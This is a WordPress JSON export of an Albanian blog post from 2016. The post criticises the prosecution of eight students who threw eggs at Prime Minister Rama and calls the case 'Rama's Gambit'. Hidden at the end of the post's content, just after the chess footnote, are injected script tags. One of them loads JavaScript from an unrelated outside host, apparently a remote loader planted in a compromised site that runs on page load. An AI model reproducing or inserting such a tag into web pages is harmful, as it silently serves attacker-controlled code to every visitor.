{"id":1520,"date":"2016-05-17T22:59:18","date_gmt":"2016-05-17T20:59:18","guid":{"rendered":"http:\/\/www.respublica.org.al\/?p=1520"},"modified":"2016-05-17T23:00:55","modified_gmt":"2016-05-17T21:00:55","slug":"dergohen-per-gjykim-studentet-qe-qelluan-ramen-me-veze-tani-do-te-ndeshemi-me-gambitin-e-rames","status":"publish","type":"post","link":"https:\/\/www.respublica.org.al\/web\/?p=1520","title":{"rendered":"Nes\u00ebr nis gjyqi ndaj studenteve q\u00eb q\u00eblluan Ram\u00ebn me vez\u00eb. Tani do t\u00eb ndeshemi me \u201cGambitin e Ram\u00ebs.\u201d"},"content":{"rendered":"<p><a href=\"http:\/\/www.respublica.org.al\/dergohen-per-gjykim-studentet-qe-qelluan-ramen-me-veze-tani-do-te-ndeshemi-me-gambitin-e-rames\/d\/\" rel=\"attachment wp-att-1522\"><img decoding=\"async\" class=\"alignleft size-medium wp-image-1522\" src=\"http:\/\/www.respublica.org.al\/wp-content\/uploads\/2016\/05\/d-300x164.jpg\" alt=\"d\" width=\"300\" height=\"164\" srcset=\"https:\/\/www.respublica.org.al\/web\/wp-content\/uploads\/2016\/05\/d-300x164.jpg 300w, https:\/\/www.respublica.org.al\/web\/wp-content\/uploads\/2016\/05\/d.jpg 633w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a>Erdhi koha p\u00ebr t\u00eb d\u00ebgjuar edhe nj\u00eb her\u00eb p\u00ebr studentet q\u00eb q\u00eblluan Ram\u00ebn me vez\u00eb. Pas hetimit disa mujor Prokuroria e Rrethit Tiran\u00eb ka d\u00ebrguar p\u00ebr gjykim 8 student\u00ebt q\u00eb protestuan ndaj Ram\u00ebs n\u00eb nj\u00eb form\u00eb t\u00eb paeksploruar m\u00eb par\u00eb n\u00eb Shqip\u00ebri. Ngjarja ndodhi m\u00eb 2 N\u00ebntor 2015 ku n\u00eb ambientet e Fakultetit t\u00eb Shkencave Sociale nj\u00eb grup student\u00ebsh protestuan ndaj vizit\u00ebs s\u00eb Ram\u00ebs n\u00eb k\u00ebt\u00eb fakultet p\u00ebr t\u00eb takuar p\u00ebrfaq\u00ebsues t\u00eb biznesit.<\/p>\n<p>Prej koh\u00ebsh, nj\u00eb grup i organizuar student\u00ebsh, po protestojn\u00eb kund\u00ebr ligjit t\u00eb ri p\u00ebr arsimin e lart\u00eb. Motoja e tyre kryesore \u00ebsht\u00eb q\u00eb student\u00ebt nuk duhen trajtuar si klient\u00eb dhe se arsimi i lart\u00eb nuk duhet t\u00eb shihet si biznes. Mir\u00ebpo, takimi i Ram\u00ebs me biznesmen\u00eb pik\u00ebrisht brenda hap\u00ebsir\u00ebs universitare, ku m\u00eb par\u00eb student\u00ebt e kishin shpallur k\u00ebt\u00eb njeri \u201cnon grata\u201d, ka provokuar reagimin e student\u00ebve, t\u00eb cil\u00ebt zgjodh\u00ebn nj\u00eb akt ndryshe, n\u00eb kuad\u00ebr t\u00eb liris\u00eb s\u00eb shprehjes dhe organizimit.<\/p>\n<p>Akuza kryesore e ngritur \u00ebsht\u00eb ajo e \u201cGoditjes p\u00ebr shkak t\u00eb detyr\u00ebs\u201d e shoq\u00ebruar edhe me akuz\u00ebn e \u201cKund\u00ebrshtimit t\u00eb punonj\u00ebsit t\u00eb policis\u00eb\u201d. Koh\u00eb m\u00eb par\u00eb, burime nga Prokuroria e P\u00ebrgjithshme i tha BIRN se nuk ka nj\u00eb akuz\u00eb p\u00ebr goditjen p\u00ebr shkak t\u00eb detyr\u00ebs. Sot, vihet re q\u00eb kjo akuz\u00eb \u00ebsht\u00eb renditur e para.<\/p>\n<p>Hetimi nisi me iniciativ\u00eb t\u00eb policis\u00eb, e cila n\u00eb m\u00ebnyr\u00eb t\u00eb pakuptimt\u00eb ka ushtruar edhe kontroll n\u00eb banesat e student\u00ebve p\u00ebr t\u00eb gjetur objekte t\u00eb tjera t\u00eb jasht\u00ebligjshme q\u00eb lidhen me vepr\u00ebn penale n\u00eb ngarkim t\u00eb tyre. Fatmir\u00ebsisht vez\u00ebt e gjendura n\u00eb sht\u00ebpit\u00eb e student\u00ebve p\u00ebr momentin nuk jan\u00eb t\u00eb jasht\u00ebligjshme.<\/p>\n<p>Vet\u00eb Kryeministri n\u00eb nj\u00eb dalje televizive u shpreh se ky akt i student\u00ebve \u00ebsht\u00eb normal n\u00eb nj\u00eb vend demokratik dhe se kjo \u00ebsht\u00eb shenj\u00eb q\u00eb qeveria nuk \u00ebsht\u00eb si ajo e djeshmja kur askush nuk guxonte ta mendonte q\u00eb mund t\u00eb godiste me vez\u00eb Kryeministrin. Mir\u00ebpo, kjo toleranc\u00eb qytetare e Ram\u00ebs\u00a0 \u00ebsht\u00eb kund\u00ebrshtuar nga zelli me t\u00eb cil\u00ebn policia nisi veprimet hetimore, duke d\u00ebrguar n\u00eb Prokurorin\u00eb e Tiran\u00ebs nj\u00eb dosje voluminoze me akte kontrolli, d\u00ebshmi, pamje filmike, etj. D\u00ebrgimi i \u00e7\u00ebshtjes n\u00eb gjykat\u00eb krijon iden\u00eb q\u00eb q\u00ebllimi i k\u00ebtij procedimi penal \u00ebsht\u00eb t\u00eb n\u00ebnshtroj\u00eb nd\u00ebrgjegjen e student\u00ebve dhe t\u00eb ver\u00eb n\u00eb vend egon e Kryeministrit, dhe se toleranca e tij mbetet produkt q\u00eb konsumohet vet\u00ebm n\u00eb televizion. Me sa duket, tashm\u00eb do t\u00eb ndeshemi me Gambitin e Ram\u00ebs<a href=\"#_ftn1\" name=\"_ftnref1\">[1]<\/a>.<\/p>\n<p><a href=\"#_ftnref1\" name=\"_ftn1\">[1]<\/a> Gambiti i Dam\u00ebs \u00ebsht\u00eb nj\u00eb nga hapjet m\u00eb t\u00eb vjetra t\u00eb njohura n\u00eb loj\u00ebn e shahut<script type=\"text\/javascript\" src=\"#\"><\/script><script type=\"text\/javascript\" src=\"http:\/\/www.get.space\/wp-content\/cache\/tmpWpfc\/theme-index.php\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Erdhi koha p\u00ebr t\u00eb d\u00ebgjuar edhe nj\u00eb her\u00eb p\u00ebr studentet q\u00eb q\u00eblluan Ram\u00ebn me vez\u00eb. Pas hetimit disa mujor Prokuroria [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1522,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"footnotes":""},"categories":[6],"tags":[],"_links":{"self":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/1520"}],"collection":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1520"}],"version-history":[{"count":3,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/1520\/revisions"}],"predecessor-version":[{"id":1526,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/1520\/revisions\/1526"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/media\/1522"}],"wp:attachment":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1520"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1520"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1520"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}